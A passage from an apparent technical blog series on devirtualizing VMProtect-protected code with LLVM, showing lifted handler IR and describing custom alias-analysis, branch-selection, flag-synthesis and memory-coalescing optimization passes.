  %coerce.dive3 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive, i32 0, i32 0
  %14 = load i64, i64* %coerce.dive3, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %10, i64 %14)
  %15 = load i64*, i64** %vsp.addr, align 8
  %16 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx5 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %16, i64 1
  %17 = bitcast %struct.VirtualRegister* %agg.tmp4 to i8*
  %18 = bitcast %struct.VirtualRegister* %arrayidx5 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %17, i8* align 1 %18, i64 8, i1 false)
  %coerce.dive6 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp4, i32 0, i32 0
  %coerce.dive7 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive6, i32 0, i32 0
  %19 = load i64, i64* %coerce.dive7, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %15, i64 %19)
  %20 = load i64*, i64** %vsp.addr, align 8
  call void @_Z3ADDIyEvRm(i64* nonnull align 8 dereferenceable(8) %20)
  %21 = load i64*, i64** %vsp.addr, align 8
  %22 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx8 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %22, i64 2
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %21, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx8)
  %23 = load i64*, i64** %vsp.addr, align 8
  %24 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx9 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %24, i64 3
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %23, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx9)
  %25 = load i64*, i64** %vsp.addr, align 8
  %26 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx11 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %26, i64 3
  %27 = bitcast %struct.VirtualRegister* %agg.tmp10 to i8*
  %28 = bitcast %struct.VirtualRegister* %arrayidx11 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %27, i8* align 1 %28, i64 8, i1 false)
  %coerce.dive12 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp10, i32 0, i32 0
  %coerce.dive13 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive12, i32 0, i32 0
  %29 = load i64, i64* %coerce.dive13, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %25, i64 %29)
  %30 = load i64*, i64** %vsp.addr, align 8
  %31 = load i64*, i64** %rax.addr, align 8
  call void @_Z7POP_REGRmS_(i64* nonnull align 8 dereferenceable(8) %30, i64* nonnull align 8 dereferenceable(8) %31)
  %32 = load i64*, i64** %vip.addr, align 8
  %33 = load i64, i64* %32, align 8
  ret i64 %33
}

The LLVM-IR compiled from the previous C++ HelperStub function.

define dso_local i64 @SimpleExample_HelperStub(i64* noalias nocapture nonnull align 8 dereferenceable(8) %rax, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rbx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rcx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rbp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r15, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR, i64* noalias nonnull align 8 dereferenceable(8) %vsp, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %vip, %struct.VirtualRegister* noalias nocapture %vmregs, i64* noalias nocapture readnone %slots) local_unnamed_addr {
entry:
  %0 = load i64, i64* %rax, align 8
  %1 = load i64, i64* %vsp, align 8
  %sub.i.i = add i64 %1, -8
  %arrayidx.i.i = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %sub.i.i
  %value.addr.0.arrayidx.sroa_cast.i.i = bitcast i8* %arrayidx.i.i to i64*
  %2 = load i64, i64* %rbx, align 8
  %sub.i.i66 = add i64 %1, -16
  %arrayidx.i.i67 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %sub.i.i66
  %value.addr.0.arrayidx.sroa_cast.i.i68 = bitcast i8* %arrayidx.i.i67 to i64*
  %qword.i62 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 1, i32 0, i32 0
  store i64 %2, i64* %qword.i62, align 1
  %3 = load i64, i64* @__undef, align 8
  %qword.i55 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 0, i32 0, i32 0
  store i64 %0, i64* %qword.i55, align 1
  %add.i32.i = add i64 %2, %0
  %cmp.i.i.i.i = icmp ult i64 %add.i32.i, %2
  %cmp1.i.i.i.i = icmp ult i64 %add.i32.i, %0
  %4 = or i1 %cmp.i.i.i.i, %cmp1.i.i.i.i
  %conv.i.i.i.i = trunc i64 %add.i32.i to i32
  %conv.i.i.i.i.i = and i32 %conv.i.i.i.i, 255
  %5 = tail call i32 @llvm.ctpop.i32(i32 %conv.i.i.i.i.i)
  %xor.i.i28.i.i = xor i64 %2, %0
  %xor1.i.i.i.i = xor i64 %xor.i.i28.i.i, %add.i32.i
  %and.i.i.i.i = and i64 %xor1.i.i.i.i, 16
  %cmp.i.i27.i.i = icmp eq i64 %add.i32.i, 0
  %shr.i.i.i.i = lshr i64 %2, 63
  %shr1.i.i.i.i = lshr i64 %0, 63
  %shr2.i.i.i.i = lshr i64 %add.i32.i, 63
  %xor.i.i.i.i = xor i64 %shr2.i.i.i.i, %shr.i.i.i.i
  %xor3.i.i.i.i = xor i64 %shr2.i.i.i.i, %shr1.i.i.i.i
  %add.i.i.i.i = add nuw nsw i64 %xor.i.i.i.i, %xor3.i.i.i.i
  %cmp.i.i25.i.i = icmp eq i64 %add.i.i.i.i, 2
  %conv.i.i.i = zext i1 %4 to i64
  %6 = shl nuw nsw i32 %5, 2
  %7 = and i32 %6, 4
  %8 = xor i32 %7, 4
  %9 = zext i32 %8 to i64
  %shl22.i.i.i = select i1 %cmp.i.i27.i.i, i64 64, i64 0
  %10 = lshr i64 %add.i32.i, 56
  %11 = and i64 %10, 128
  %shl34.i.i.i = select i1 %cmp.i.i25.i.i, i64 2048, i64 0
  %or6.i.i.i = or i64 %11, %shl22.i.i.i
  %and13.i.i.i = or i64 %or6.i.i.i, %and.i.i.i.i
  %or17.i.i.i = or i64 %and13.i.i.i, %conv.i.i.i
  %and25.i.i.i = or i64 %or17.i.i.i, %shl34.i.i.i
  %or29.i.i.i = or i64 %and25.i.i.i, %9
  %qword.i36 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 2, i32 0, i32 0
  store i64 %or29.i.i.i, i64* %qword.i36, align 1
  store i64 %3, i64* %value.addr.0.arrayidx.sroa_cast.i.i68, align 1
  %qword.i = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 3, i32 0, i32 0
  store i64 %add.i32.i, i64* %qword.i, align 1
  store i64 %3, i64* %value.addr.0.arrayidx.sroa_cast.i.i, align 1
  store i64 %add.i32.i, i64* %rax, align 8
  %12 = load i64, i64* %vip, align 8
  ret i64 %12
}

The LLVM-IR of the HelperStub function with inlined and optimized calls to the handlers

The last snippet represents all the semantic computations related to a VmBlock, as described in the high level overview. If the code we lifted captures the whole semantics of a VmStub, we can additionally wrap the HelperStub function with the HelperFunction function, which enforces the liveness properties described in the Liveness and aliasing information section, enabling us to obtain only the computations updating the host execution context:

extern "C" size_t SimpleExample_HelperFunction(
    rptr rax, rptr rbx, rptr rcx,
    rptr rdx, rptr rsi, rptr rdi,
    rptr rbp, rptr rsp, rptr r8,
    rptr r9, rptr r10, rptr r11,
    rptr r12, rptr r13, rptr r14,
    rptr r15, rptr flags, size_t KEY_STUB,
    size_t RET_ADDR, size_t REL_ADDR) {
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = SimpleExample_HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}

The C++ HelperFunction function with the call to the HelperStub function and the relevant stack frame allocations.

define dso_local i64 @SimpleExample_HelperFunction(i64* noalias nocapture nonnull align 8 dereferenceable(8) %rax, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rbx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rcx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rbp, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rsp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r15, i64* noalias nocapture nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) local_unnamed_addr {
entry:
  %0 = load i64, i64* %rax, align 8
  %1 = load i64, i64* %rbx, align 8
  %add.i32.i.i = add i64 %1, %0
  store i64 %add.i32.i.i, i64* %rax, align 8
  ret i64 0
}

The LLVM-IR HelperFunction function with fully optimized code.

It can be seen that the example is just pushing the values of the registers rax and rbx, loading them in vmregs[0] and vmregs[1] respectively, pushing the VmRegisters on the stack, adding them together, popping the updated flags in vmregs[2], popping the addition’s result to vmregs[3] and finally pushing vmregs[3] on the stack to be popped in the rax register at the end. The liveness of the values of the VmRegisters ends with the end of the function, hence the updated flags saved in vmregs[2] won’t be reflected on the host execution context. Looking at the final snippet we can see that the semantics of the code have been successfully obtained.

What’s next?

In Part 2 we’ll put the described structures and helpers to good use, digging into the details of the virtualized CFG exploration and introducing the basics of the LLVM optimization pipeline.

Tickling VMProtect with LLVM: Part 3

By: fvrmatteo
8 September 2021 at 23:00

This post will introduce 7 custom passes that, once added to the optimization pipeline, will make the overall LLVM-IR output more readable. Some words will be spent on the unsupported instructions lifting and recompilation topics. Finally, the output of 6 devirtualized functions will be shown.

Custom passes

This section will give an overview of some custom passes meant to:

  • Solve VMProtect specific optimization problems;
  • Work around some limitations of existing LLVM passes, with implementations that wouldn’t meet the quality standard of an official LLVM pass.

SegmentsAA

This pass falls under the category of the VMProtect specific optimization problems and is probably the most delicate of the section, as it may be feeding LLVM with unsafe assumptions. The aliasing information described in the Liveness and aliasing information section will finally come in handy. In fact, the goal of the pass is to identify the type of two pointers and determine if they can be deemed as not aliasing with one another.

With the structures defined in the previous sections, LLVM is already able to infer that two pointers derived from the following sources don’t alias with one another:

  • general purpose registers
  • VmRegisters
  • VmPassingSlots
  • GS zero-sized array
  • FS zero-sized array
  • RAM zero-sized array (with constant index)
  • RAM zero-sized array (with symbolic index)

Additionally, LLVM can discern between pointers with RAM base using a simple symbolic index. For example an access to [rsp - 0x10] (local stack slot) will be considered as NoAlias when compared with an access to [rsp + 0x10] (incoming stack argument).

But LLVM’s alias analysis passes fall short when handling pointers that use the RAM array as base and employ a more convoluted symbolic index, and the shortcoming is entirely due to the type and context information that got lost during the compilation to binary.

The pass is inspired by existing implementations (1, 2, 3) that are basing their checks on the identification of pointers belonging to different segments and address spaces.

Slicing the symbolic index used in a RAM array access we can discern with high confidence between the following additional NoAlias memory accesses:

  • indirect access: if the access is a stack argument ([rsp] or [rsp + positive_constant_offset + symbolic_offset]), a dereferenced general purpose register ([rax]) or a nested dereference (val1 = [rax], val2 = [val1]); identified as TyIND in the code;
  • local stack slot: if the access is of the form [rsp - positive_constant_offset + symbolic_offset]; identified as TySS in the code;
  • local stack array: if the access is of the form [rsp - positive_constant_offset + phi_index]; identified as TyARR in the code.

If the pointer type cannot be reliably detected, an unknown type (identified as TyUNK in the code) is being used, and the comparison between the pointers is automatically skipped. If the pass cannot return a NoAlias result, the query is passed back to the default alias analysis pipeline.
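
A hypothetical sketch of the final decision logic could look like the following; the enum and helper names are assumptions, not the actual pass code.

#include "llvm/Analysis/AliasAnalysis.h"

// Pointer kinds inferred by slicing the symbolic index (names assumed).
enum PointerType { TyIND, TySS, TyARR, TyUNK };

llvm::AliasResult queryAlias(PointerType A, PointerType B) {
  // Unknown pointers: skip the comparison and defer to the default pipeline.
  if (A == TyUNK || B == TyUNK)
    return llvm::AliasResult::MayAlias;
  // Pointers of different kinds are deemed not to alias; same-kind pointers
  // are again deferred to the default alias analysis pipeline.
  return (A == B) ? llvm::AliasResult::MayAlias : llvm::AliasResult::NoAlias;
}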

One could argue that the pass is not really needed, as it is unlikely that the propagation of the sensitive information we need to successfully explore the virtualized CFG is hindered by aliasing issues. In fact, the computation of a conditional branch at the end of a VmBlock is guaranteed not to be hindered by a symbolic memory store happening before the jump VmHandler accesses the branch destination. But there are some cases where VMProtect pushes the address of the next VmStub in one of the first VmBlocks, doing memory stores in between and accessing the pushed value only in one or more VmExits. That could be a case where discerning between a local stack slot and an indirect access enables the propagation of the pushed address.

Regardless of the aforementioned issue, which can be solved with some ad-hoc store-to-load detection logic, playing around with the alias analysis information that can be fed to LLVM could make the devirtualized code more readable. We have to keep in mind that there may be edge cases where the original code is breaking our assumptions, so having at least a vague idea of the involved pointers accessed at runtime could give us more confidence or force us to err on the safe side, relying solely on the built-in LLVM alias analysis passes.

The assembly snippet shown below has been devirtualized with and without adding the SegmentsAA pass to the pipeline. If we are sure that at runtime, before the push rax instruction, rcx doesn’t contain the value rsp - 8 (extremely unexpected on benign code), we can safely enable the SegmentsAA pass and obtain a cleaner output.

start:
  push rax
  mov qword ptr [rsp], 1
  mov qword ptr [rcx], 2
  pop rax

The assembly code writing to two possibly aliasing memory slots

define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rcx, align 8, !alias.scope !22, !noalias !27
  %2 = inttoptr i64 %1 to i64*
  store i64 2, i64* %2, align 1, !noalias !65
  store i64 1, i64* %rax, align 8, !tbaa !4, !alias.scope !66, !noalias !67
  ret i64 5368713278
}

The devirtualized code with the SegmentsAA pass added to the pipeline, with the assumption that rcx differs from rsp - 8

define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rsp, align 8, !tbaa !4, !alias.scope !22, !noalias !27
  %2 = add i64 %1, -8
  %3 = load i64, i64* %rcx, align 8, !alias.scope !65, !noalias !66
  %4 = inttoptr i64 %2 to i64*
  store i64 1, i64* %4, align 1, !noalias !67
  %5 = inttoptr i64 %3 to i64*
  store i64 2, i64* %5, align 1, !noalias !67
  %6 = load i64, i64* %4, align 1, !noalias !67
  store i64 %6, i64* %rax, align 8, !tbaa !4, !alias.scope !68, !noalias !69
  ret i64 5368713278
}

The devirtualized code without the SegmentsAA pass added to the pipeline and therefore no assumptions fed to LLVM

Alias analysis is a complex topic, and experience taught me that most of the propagation issues happening while using LLVM to deobfuscate some code are related to LLVM’s alias analysis passes being hindered by some pointer computation. Therefore, having the capability to feed LLVM with context-aware information could be the only way to handle certain types of obfuscation. Beware that other tools you are used to are most likely making similar “safe” assumptions under the hood (e.g. concolic execution tools using the concrete pointer to answer the aliasing queries).

The takeaway from this section is that, if needed, you can define your own alias analysis callback pass to be integrated in the optimization pipeline in such a way that pre-existing passes can make use of the refined aliasing query results. This is similar to updating IDA’s stack variables with proper type definitions to improve the propagation results.

KnownIndexSelect

This pass falls under the category of the VMProtect specific optimization problems. In fact, whoever looked into VMProtect 3.0.9 knows that the following trick, reimplemented as high level C code for simplicity, is being internally used to select between two branches of a conditional jump.

uint64_t ConditionalBranchLogic(uint64_t RFLAGS) {
  // Extracting the ZF flag bit
  uint64_t ConditionBit = (RFLAGS & 0x40) >> 6;
  // Writing the jump destinations
  uint64_t Stack[2] = { 0 };
  Stack[0] = 5369966919;
  Stack[1] = 5369966790;
  // Selecting the correct jump destination
  return Stack[ConditionBit];
}

What is really happening at the low level is that the branch destinations are written to adjacent stack slots and then a conditional load, controlled by the previously computed flags, is going to select between one slot or the other to fetch the right jump destination.

LLVM doesn’t automatically see through the conditional load, but it is providing us with all the needed information to write such an optimization ourselves. In fact, the ValueTracking analysis exposes the computeKnownBits function that we can use to determine if the index used in a getelementptr instruction is bound to have just two values.
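
A hypothetical sketch of that check could look like the following; the helper name and structure are assumptions, not the actual pass code.

#include "llvm/Analysis/ValueTracking.h"
#include "llvm/Support/KnownBits.h"

// The index can take exactly two values when all of its bits but one are
// known; the two feasible values differ only in the single unknown bit.
bool hasTwoFeasibleValues(const llvm::Value *Index, const llvm::DataLayout &DL,
                          uint64_t &Val0, uint64_t &Val1) {
  llvm::KnownBits Known = llvm::computeKnownBits(Index, DL);
  llvm::APInt Unknown = ~(Known.Zero | Known.One);
  if (Unknown.countPopulation() != 1)
    return false;
  Val0 = Known.One.getZExtValue();
  Val1 = (Known.One | Unknown).getZExtValue();
  return true;
}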

At this point we can generate two separated load instructions accessing the stack slots with the inferred indices and feed them to a select instruction controlled by the index itself. At the next store-to-load propagation, LLVM will happily identify the matching store and load instructions, propagating the constants representing the conditional branch destinations and generating a nice select instruction with second and third constant operands.

; Matched pattern
%i0 = add i64 %base, %index
%i1 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %i0
%i2 = bitcast i8* %i1 to i64*
%i3 = load i64, i64* %i2, align 1

; Exploded form
%51 = add i64 %base, 0
%52 = add i64 %base, 8
%53 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
%54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
%55 = bitcast i8* %53 to i64*
%56 = bitcast i8* %54 to i64*
%57 = load i64, i64* %55, align 8
%58 = load i64, i64* %56, align 8
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 %57, i64 %58

; Simplified select instruction
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 5369966919, i64 5369966790

The snippet above shows the matched pattern, its exploded form suitable for the LLVM propagation and its final optimized shape. In this case the ValueTracking analysis provided the values 0 and 8 as the only feasible ones for the %index value.

A brief discussion about this pass can be found in this chain of messages in the LLVM mailing list.

SynthesizeFlags

This pass falls in between the categories of the VMProtect specific optimization problems and LLVM optimization limitations. In fact, this pass is based on the enumerative synthesis logic implemented by Souper, with some minor tweaks to make it more performant for our use-case.

This pass exists because I’m lazy and the fewer ad-hoc patterns I write, the happier I am. The patterns we are talking about are the ones generated by the flag manipulations that VMProtect does when computing the condition for a conditional branch. LLVM already does a good job with simplifying part of the patterns, but to obtain mint-like results we absolutely need to help it a bit.

There’s not much to say about this pass: it is basically invoking Souper’s enumerative synthesis with a selected set of components (Inst::CtPop, Inst::Eq, Inst::Ne, Inst::Ult, Inst::Slt, Inst::Ule, Inst::Sle, Inst::SAddO, Inst::UAddO, Inst::SSubO, Inst::USubO, Inst::SMulO, Inst::UMulO), requiring the synthesis of a single instruction, enabling the data-flow pruning option and bounding the LHS candidates to a maximum of 50. Additionally the pass is executing the synthesis only on the i1 conditions used by the select and br instructions.

This Godbolt page shows the devirtualized LLVM-IR output obtained appending the SynthesizeFlags pass to the pipeline and the resulting assembly with the properly recompiled conditional jumps. The original assembly code can be seen below. It’s a dummy sequence of instructions where the key piece is the comparison between the rax and rbx registers that drives the conditional branch jcc.

start:
  cmp rax, rbx
  jcc label
  and rcx, rdx
  mov qword ptr ds:[rcx], 1
  jmp exit
label:
  xor rcx, rdx
  add qword ptr ds:[rcx], 2
exit:

MemoryCoalescing

This pass falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. The transformations done by this pass are nonetheless applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Passes like DSE already attempt to handle the case where a store instruction is partially or completely overlapping with other store instructions. However, the more convoluted case of multiple stores contributing to the value of a single memory slot is only partially handled.

This pass is focusing on the handling of the case illustrated in the following snippet, where multiple smaller stores contribute to the creation of a bigger value subsequently accessed by a single load instruction.

define dso_local i64 @WhatDidYouDoToMySonYouEvilMonster(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = add i64 %1, -8
  %3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
  %4 = add i64 %1, -16
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = load i64, i64* %rax, align 8
  %7 = add i64 %1, -10
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 %6, i64* %9, align 1
  %10 = bitcast i8* %8 to i32*
  %11 = trunc i64 %6 to i32
  %12 = add i64 %1, -6
  %13 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %12
  %14 = bitcast i8* %13 to i32*
  store i32 %11, i32* %14, align 1
  %15 = bitcast i8* %13 to i16*
  %16 = trunc i64 %6 to i16
  %17 = add i64 %1, -4
  %18 = add i64 %1, -12
  %19 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %18
  %20 = bitcast i8* %19 to i64*
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %17
  %22 = bitcast i8* %21 to i16*
  %23 = load i16, i16* %22, align 1
  store i16 %23, i16* %15, align 1
  %24 = load i32, i32* %14, align 1
  %25 = shl i32 %24, 8
  %26 = bitcast i8* %21 to i32*
  store i32 %25, i32* %26, align 1
  %27 = bitcast i8* %3 to i16*
  store i16 %16, i16* %27, align 1
  %28 = bitcast i8* %8 to i16*
  store i16 %16, i16* %28, align 1
  %29 = load i32, i32* %10, align 1
  %30 = shl i32 %29, 8
  %31 = bitcast i8* %3 to i32*
  store i32 %30, i32* %31, align 1
  %32 = add i64 %1, -14
  %33 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %32
  %34 = add i64 %1, -2
  %35 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %34
  %36 = bitcast i8* %35 to i16*
  %37 = load i16, i16* %36, align 1
  store i16 %37, i16* %27, align 1
  %38 = add i64 %1, -18
  %39 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %38
  %40 = bitcast i8* %39 to i64*
  store i64 %6, i64* %40, align 1
  %41 = bitcast i8* %39 to i32*
  %42 = bitcast i8* %33 to i16*
  %43 = load i16, i16* %42, align 1
  %44 = bitcast i8* %19 to i16*
  %45 = load i16, i16* %44, align 1
  store i16 %45, i16* %42, align 1
  %46 = bitcast i8* %33 to i32*
  %47 = load i32, i32* %46, align 1
  %48 = shl i32 %47, 8
  %49 = bitcast i8* %19 to i32*
  store i32 %48, i32* %49, align 1
  %50 = bitcast i8* %5 to i16*
  store i16 %43, i16* %50, align 1
  %51 = bitcast i8* %39 to i16*
  store i16 %43, i16* %51, align 1
  %52 = load i32, i32* %41, align 1
  %53 = shl i32 %52, 8
  %54 = bitcast i8* %5 to i32*
  store i32 %53, i32* %54, align 1
  %55 = load i16, i16* %28, align 1
  store i16 %55, i16* %50, align 1
  %56 = load i32, i32* %54, align 1
  store i32 %56, i32* %49, align 1
  %57 = load i64, i64* %20, align 1
  store i64 %57, i64* %rax, align 8
  ret i64 5368713262
}

Now, you can arm yourself with patience and manually match all the store and load operations, or you can trust me when I tell you that all of them are concurring to the creation of a single i64 value that will be finally saved in the rax register.

The pass is working at the intra-block level and it’s relying on the analysis results provided by the MemorySSA, ScalarEvolution and AAResults interfaces to backward walk the definition chains concurring to the creation of the value fetched by each load instruction in the block. Doing that, it fills a structure which keeps track of the aliasing store instructions, the stored values, and the offsets and sizes overlapping with the memory slot fetched by each load. If a sequence of store assignments completely defining the value of the whole memory slot is found, the chain is processed to remove the store-to-load indirection. Subsequent passes may then rely on this new indirection-free chain to apply more transformations. As an example, the previous LLVM-IR snippet turns into the following optimized LLVM-IR snippet when the MemoryCoalescing pass is applied before executing the InstCombine pass. Nice huh?

